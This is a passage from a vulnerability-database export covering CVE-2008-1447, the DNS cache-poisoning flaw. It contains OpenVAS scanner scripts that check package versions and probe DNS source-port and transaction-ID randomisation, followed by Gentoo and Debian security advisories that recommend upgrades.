exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND-UPGRADE\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND2-UPGRADE\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-INETD\", patch_list:['PHNE_37865'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_37865'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS2-RUN\", patch_list:['PHNE_37865'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", revision:\"9.2.0\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND-UPGRADE\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv920.INETSVCS-BIND\", revision:\"B.11.11.01.011\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-port recursion vulnerability. 
Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see references). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104103", "type": "openvas", "title": "Nmap NSE net: dns-random-srcport", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script:\n# Script: Brandon Enright <bmenrigh@ucsd.edu>\n# porttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104103\");\n script_version(\"2020-07-07T13:54:18+0000\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"2020-07-07 13:54:18 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE net: dns-random-srcport\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_xref(name:\"URL\", value:\"https://www.dns-oarc.net/oarc/services/porttest\");\n\n script_tag(name:\"summary\", value:\"Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see references). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. 
In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-09-18T11:20:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.", "modified": "2017-09-15T00:00:00", "published": "2013-02-28T00:00:00", "id": "OPENVAS:803552", "href": "http://plugins.openvas.org/nasl.php?oid=803552", "type": "openvas", "title": "Nmap NSE 6.01: dns-random-txid", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap6_dns_random_txid.nasl 7148 2017-09-15 13:01:14Z cfischer $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: \n# Script: Brandon Enright <bmenrigh@ucsd.edu>\\n\n# txidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n# \n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.\";\n\nif(description)\n{\n script_id(803552);\n script_version(\"$Revision: 7148 $\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-15 15:01:14 +0200 (Fri, 15 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-28 19:00:41 +0530 (Thu, 28 Feb 2013)\");\n script_name(\"Nmap NSE 6.01: dns-random-txid\");\n\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n\n\n\n script_dependencies(\"toolcheck.nasl\");\n script_mandatory_keys(\"Tools/Present/nmap6.01\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse\");\n\n script_tag(name : \"summary\" , value : 
tag_summary);\n exit(0);\n}\n\n# The corresponding NSE script doesn't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\n## DNS Port\nport = 53;\nif(! get_udp_port_state(port)){\n exit(0);\n}\n\nargv = make_list(\"nmap\", \"-sU\", \"--script=dns-random-txid.nse\",\n \"-p\", port, get_host_ip());\n\n## Run nmap and Get the Result\nres = pread(cmd: \"nmap\", argv: argv);\n\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"dns-random-txid\" >< result) {\n msg = string('Result found by Nmap Security Scanner (dns-random-txid.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n', 'nmap ', argv);\n log_message(data: msg, port:port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880259", "href": "http://plugins.openvas.org/nasl.php?oid=880259", "type": "openvas", "title": "CentOS Update for bind CESA-2008:0533 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2008:0533 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as 
published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols.\n\n The DNS protocol protects against spoofing attacks by requiring an attacker\n to predict both the DNS transaction ID and UDP source port of a request. In\n recent years, a number of papers have found problems with DNS\n implementations which make it easier for an attacker to perform DNS\n cache-poisoning attacks.\n \n Previous versions of BIND did not use randomized UDP source ports. If an\n attacker was able to predict the random DNS transaction ID, this could make\n DNS cache-poisoning attacks easier. 
In order to provide more resilience,\n BIND has been updated to use a range of random UDP source ports.\n (CVE-2008-1447)\n \n Note: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\n and 5 to allow BIND to use random UDP source ports.\n \n Users of BIND are advised to upgrade to these updated packages, which\n contain a backported patch to add this functionality.\n \n Red Hat would like to thank Dan Kaminsky for reporting this issue.\";\n\ntag_affected = \"bind on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-July/015081.html\");\n script_id(880259);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"CESA\", value: \"2008:0533\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"CentOS Update for bind CESA-2008:0533 centos4 x86_64\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release 
== NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"selinux-policy-targeted\", rpm:\"selinux-policy-targeted~1.17.30~2.150.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"selinux-policy-targeted-sources\", rpm:\"selinux-policy-targeted-sources~1.17.30~2.150.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. 
In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.", "modified": "2017-03-06T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:104103", "href": "http://plugins.openvas.org/nasl.php?oid=104103", "type": "openvas", "title": "Nmap NSE net: dns-random-srcport", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_dns_random_srcport_net.nasl 5499 2017-03-06 13:06:09Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: \n# Script: Brandon Enright <bmenrigh@ucsd.edu>\n# porttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/porttest). 
Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.\";\n\nif(description)\n{\n script_id(104103);\n script_version(\"$Revision: 5499 $\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-06 14:06:09 +0100 (Mon, 06 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE net: dns-random-srcport\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n# The corresponding NSE script doesn't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n\n nmap_nse_register(script:\"dns-random-srcport\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"dns-random-srcport\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (dns-random-srcport.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + 
res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:49:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update to bind9\nannounced via advisory DSA 1603-1.", "modified": "2017-07-07T00:00:00", "published": "2008-07-15T00:00:00", "id": "OPENVAS:61249", "href": "http://plugins.openvas.org/nasl.php?oid=61249", "type": "openvas", "title": "Debian Security Advisory DSA 1603-1 (bind9)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1603_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1603-1 (bind9)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Dan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. 
Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's BIND 9 packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nFor more details on the impact of this update and steps to\ntake to ensure a smooth upgrade, please visit the referenced\nsecurity advisory.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 9.3.4-2etch3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your bind9 package.\";\ntag_summary = \"The remote host is missing an update to bind9\nannounced via advisory DSA 1603-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201603-1\";\n\n\nif(description)\n{\n script_id(61249);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-07-15 02:29:31 +0200 (Tue, 15 Jul 2008)\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Debian Security Advisory DSA 1603-1 (bind9)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccc0\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lwresd\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccfg1\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisc11\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind9-0\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdns22\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblwres9\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447", "CVE-2008-3350"], "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200809-02\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: dnsmasq: Denial of Service and DNS spoofing\r\n Date: September 04, 2008\r\n Bugs: #231282, #232523\r\n ID: 200809-02\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nTwo vulnerabilities in dnsmasq might allow for a Denial of Service or\r\nspoofing of DNS replies.\r\n\r\nBackground\r\n==========\r\n\r\nDnsmasq is a lightweight and easily-configurable DNS forwarder and DHCP\r\nserver.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 net-dns/dnsmasq < 2.45 >= 2.45\r\n\r\nDescription\r\n===========\r\n\r\n* Dan Kaminsky of IOActive reported that dnsmasq does not randomize\r\n UDP source ports when forwarding DNS queries to a recursing DNS\r\n server (CVE-2008-1447).\r\n\r\n* Carlos Carvalho reported that dnsmasq in the 2.43 version does not\r\n properly handle clients sending inform or renewal queries for unknown\r\n DHCP leases, leading to a crash (CVE-2008-3350).\r\n\r\nImpact\r\n======\r\n\r\nA remote attacker could send spoofed DNS response traffic to dnsmasq,\r\npossibly involving generating queries via multiple vectors, and spoof\r\nDNS replies, which 
could e.g. lead to the redirection of web or mail\r\ntraffic to malicious sites. Furthermore, an attacker could generate\r\ninvalid DHCP traffic and cause a Denial of Service.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll dnsmasq users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=net-dns/dnsmasq-2.45"\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CVE-2008-3350\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3350\r\n [ 2 ] CVE-2008-1447\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200809-02.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. 
Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2008 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "edition": 1, "modified": "2008-09-07T00:00:00", "published": "2008-09-07T00:00:00", "id": "SECURITYVULNS:DOC:20475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20475", "title": "[ GLSA 200809-02 ] dnsmasq: Denial of Service and DNS spoofing", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1619-1 security@debian.org\r\nhttp://www.debian.org/security/ Devin Carraway\r\nJuly 27, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : python-dns\r\nVulnerability : DNS response spoofing\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-1447\r\nDebian Bug : 490217\r\n\r\nMultiple weaknesses have been identified in PyDNS, a DNS client\r\nimplementation for the Python language. Dan Kaminsky identified a\r\npractical vector of DNS response spoofing and cache poisoning,\r\nexploiting the limited entropy in a DNS transaction ID and lack of\r\nUDP source port randomization in many DNS implementations. 
